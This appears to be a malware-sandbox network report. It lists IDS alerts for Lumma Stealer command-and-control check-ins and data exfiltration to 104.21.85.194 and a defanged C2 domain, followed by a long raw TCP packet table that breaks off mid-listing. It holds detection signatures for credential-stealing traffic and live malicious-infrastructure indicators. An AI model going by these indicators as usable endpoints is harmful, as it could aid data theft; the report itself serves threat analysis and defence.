2024-11-01T10:50:56.931094+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.85.194	443	TCP
2024-11-01T10:50:57.391364+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49741	104.21.85.194	443	TCP
2024-11-01T10:50:57.391364+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49741	104.21.85.194	443	TCP
2024-11-01T10:50:58.181978+0100	2057072	ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)	1	192.168.2.4	49743	104.21.85.194	443	TCP
2024-11-01T10:50:58.181978+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.85.194	443	TCP
2024-11-01T10:50:59.505004+0100	2057072	ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)	1	192.168.2.4	49749	104.21.85.194	443	TCP
2024-11-01T10:50:59.505004+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49749	104.21.85.194	443	TCP
2024-11-01T10:51:00.724341+0100	2057072	ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)	1	192.168.2.4	49755	104.21.85.194	443	TCP
2024-11-01T10:51:00.724341+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49755	104.21.85.194	443	TCP
2024-11-01T10:51:02.250998+0100	2057072	ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)	1	192.168.2.4	49766	104.21.85.194	443	TCP
2024-11-01T10:51:02.250998+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49766	104.21.85.194	443	TCP
2024-11-01T10:51:02.968026+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49766	104.21.85.194	443	TCP
2024-11-01T10:51:03.970713+0100	2057072	ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)	1	192.168.2.4	49777	104.21.85.194	443	TCP
2024-11-01T10:51:03.970713+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49777	104.21.85.194	443	TCP
2024-11-01T10:51:03.974381+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49777	104.21.85.194	443	TCP
2024-11-01T10:51:07.061291+0100	2057072	ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)	1	192.168.2.4	49793	104.21.85.194	443	TCP
2024-11-01T10:51:07.061291+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49793	104.21.85.194	443	TCP
2024-11-01T10:51:07.534926+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49793	104.21.85.194	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 10:50:21.724653006 CET	49723	80	192.168.2.4	199.232.210.172
Nov 1, 2024 10:50:21.729984045 CET	80	49723	199.232.210.172	192.168.2.4
Nov 1, 2024 10:50:21.730052948 CET	49723	80	192.168.2.4	199.232.210.172
Nov 1, 2024 10:50:44.534722090 CET	49732	80	192.168.2.4	95.101.111.144
Nov 1, 2024 10:50:44.534769058 CET	49731	80	192.168.2.4	95.101.111.137
Nov 1, 2024 10:50:44.534815073 CET	49730	80	192.168.2.4	95.101.111.168
Nov 1, 2024 10:50:44.539947033 CET	80	49732	95.101.111.144	192.168.2.4
Nov 1, 2024 10:50:44.540004015 CET	49732	80	192.168.2.4	95.101.111.144
Nov 1, 2024 10:50:44.540529013 CET	80	49731	95.101.111.137	192.168.2.4
Nov 1, 2024 10:50:44.540570021 CET	49731	80	192.168.2.4	95.101.111.137
Nov 1, 2024 10:50:44.540581942 CET	80	49730	95.101.111.168	192.168.2.4
Nov 1, 2024 10:50:44.540622950 CET	49730	80	192.168.2.4	95.101.111.168
Nov 1, 2024 10:50:55.479036093 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:55.479074001 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:55.479146004 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:55.481863022 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:55.481874943 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.091545105 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.091682911 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.096002102 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.096008062 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.096260071 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.138952971 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.138983011 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.139005899 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.269373894 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.269412041 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.269447088 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.269527912 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.269536972 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.269546032 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.269587040 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.269587040 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.269639969 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.271003962 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.271013975 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.271047115 CET	49739	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.271049976 CET	443	49739	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.315160990 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.315196991 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.315265894 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.315495014 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.315506935 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.931005001 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.931093931 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.932159901 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.932173014 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.932372093 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:56.933443069 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.933465958 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:56.933499098 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.281718016 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:57.281734943 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:57.281810999 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:57.282059908 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:57.282069921 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:57.391379118 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.391505003 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.391532898 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.391561031 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.391627073 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.391643047 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.391743898 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.392029047 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.392083883 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.392092943 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.392527103 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.392575026 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.392581940 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.440898895 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.509884119 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.509972095 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.510066986 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.510077000 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.510319948 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.510365963 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.510370970 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.510395050 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.510473967 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.510595083 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.510605097 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.510618925 CET	49741	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.510622978 CET	443	49741	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.544084072 CET	49743	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.544102907 CET	443	49743	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:57.544166088 CET	49743	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.544698000 CET	49743	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:57.544708967 CET	443	49743	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:58.014210939 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.014333010 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.015743017 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.015753984 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.015974998 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.023893118 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.071333885 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.181768894 CET	443	49743	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:58.181977987 CET	49743	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:58.182955980 CET	49743	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:58.182965994 CET	443	49743	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:58.183183908 CET	443	49743	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:58.184256077 CET	49743	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:58.184386969 CET	49743	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:58.184425116 CET	443	49743	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:58.184478045 CET	49743	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:58.184485912 CET	443	49743	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:58.248078108 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.248105049 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.248117924 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.248280048 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.248280048 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.248303890 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.248357058 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.270303011 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.270319939 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.270384073 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.270391941 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.270446062 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.365528107 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.365546942 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.365700960 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.365710974 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.365760088 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.386955023 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.386976004 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.387029886 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.387037039 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.387079954 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.388583899 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.388600111 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.388654947 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.388664961 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.388710022 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.390325069 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.390341043 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.390393972 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.390399933 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.390440941 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.483141899 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.483156919 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.483217001 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.483223915 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.483283043 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.503676891 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.503690958 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.503746986 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.503752947 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.503791094 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.504570007 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.504585981 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.504633904 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.504640102 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.504657030 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.504703999 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.506474972 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.506489038 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.506591082 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.506597042 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.506644011 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.507730007 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.507745028 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.507786989 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.507791996 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.507819891 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.507843018 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.509500027 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.509515047 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.509566069 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.509571075 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.509610891 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.551876068 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.551891088 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.551934958 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.551940918 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.551969051 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.551989079 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.599276066 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.599328995 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.599329948 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.599375963 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.605958939 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.605969906 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.605993032 CET	49742	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.605998993 CET	443	49742	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.644670010 CET	49744	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.644718885 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.644789934 CET	49744	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.645603895 CET	49745	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.645632982 CET	443	49745	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.645689964 CET	49745	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.646424055 CET	49744	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.646442890 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.646508932 CET	49745	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.646519899 CET	443	49745	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.647476912 CET	49746	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.647485971 CET	443	49746	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.647531986 CET	49746	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.647640944 CET	49746	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.647658110 CET	443	49746	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.648617983 CET	49747	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.648626089 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.648675919 CET	49747	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.649152040 CET	49748	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.649175882 CET	443	49748	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.649220943 CET	49748	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.649276018 CET	49747	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.649286032 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.649369001 CET	49748	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:58.649380922 CET	443	49748	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:58.849313974 CET	443	49743	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:58.849386930 CET	443	49743	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:58.849566936 CET	49743	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:58.849783897 CET	49743	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:58.849795103 CET	443	49743	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:58.866887093 CET	49749	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:58.866916895 CET	443	49749	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:58.866990089 CET	49749	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:58.867253065 CET	49749	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:58.867266893 CET	443	49749	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:59.374260902 CET	443	49745	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.374315023 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.374830008 CET	49745	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.374830961 CET	49744	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.374850988 CET	443	49745	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.374855042 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.375242949 CET	49744	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.375248909 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.375296116 CET	49745	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.375305891 CET	443	49745	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.377458096 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.377729893 CET	49747	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.377751112 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.378101110 CET	49747	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.378104925 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.385518074 CET	443	49746	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.385804892 CET	49746	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.385814905 CET	443	49746	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.386162043 CET	49746	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.386167049 CET	443	49746	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.390640974 CET	443	49748	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.390945911 CET	49748	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.390974045 CET	443	49748	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.391294956 CET	49748	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.391302109 CET	443	49748	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.504455090 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.504473925 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.504519939 CET	49744	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.504530907 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.504569054 CET	49744	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.504714966 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.504754066 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.504760027 CET	49744	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.504779100 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.504789114 CET	49744	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.504793882 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.504952908 CET	443	49749	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:59.505003929 CET	49749	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:59.505451918 CET	443	49745	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.505532980 CET	443	49745	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.505569935 CET	49745	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.507033110 CET	49749	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:59.507041931 CET	443	49749	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:59.507246017 CET	443	49749	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:59.507534981 CET	49745	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.507546902 CET	443	49745	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.507555962 CET	49745	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.507560015 CET	443	49745	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.507860899 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.507879019 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.507915974 CET	49747	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.507924080 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.507935047 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.507977009 CET	49747	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.508924007 CET	49749	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:59.509125948 CET	49749	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:50:59.509155035 CET	443	49749	104.21.85.194	192.168.2.4
Nov 1, 2024 10:50:59.510354042 CET	49750	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.510382891 CET	443	49750	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.510437965 CET	49750	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.510584116 CET	49751	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.510610104 CET	443	49751	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.510653019 CET	49751	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.510905981 CET	49747	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.510912895 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.510925055 CET	49747	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.510927916 CET	443	49747	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.511349916 CET	49751	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.511363029 CET	443	49751	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.511778116 CET	49750	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.511792898 CET	443	49750	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.513096094 CET	49752	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.513122082 CET	443	49752	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.513170004 CET	49752	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.513295889 CET	49752	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.513307095 CET	443	49752	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.516221046 CET	443	49746	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.516238928 CET	443	49746	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.516274929 CET	443	49746	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.516280890 CET	49746	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.516319036 CET	49746	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.516469002 CET	49746	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.516474009 CET	443	49746	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.516483068 CET	49746	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.516486883 CET	443	49746	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.518410921 CET	49753	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.518433094 CET	443	49753	13.107.246.45	192.168.2.4
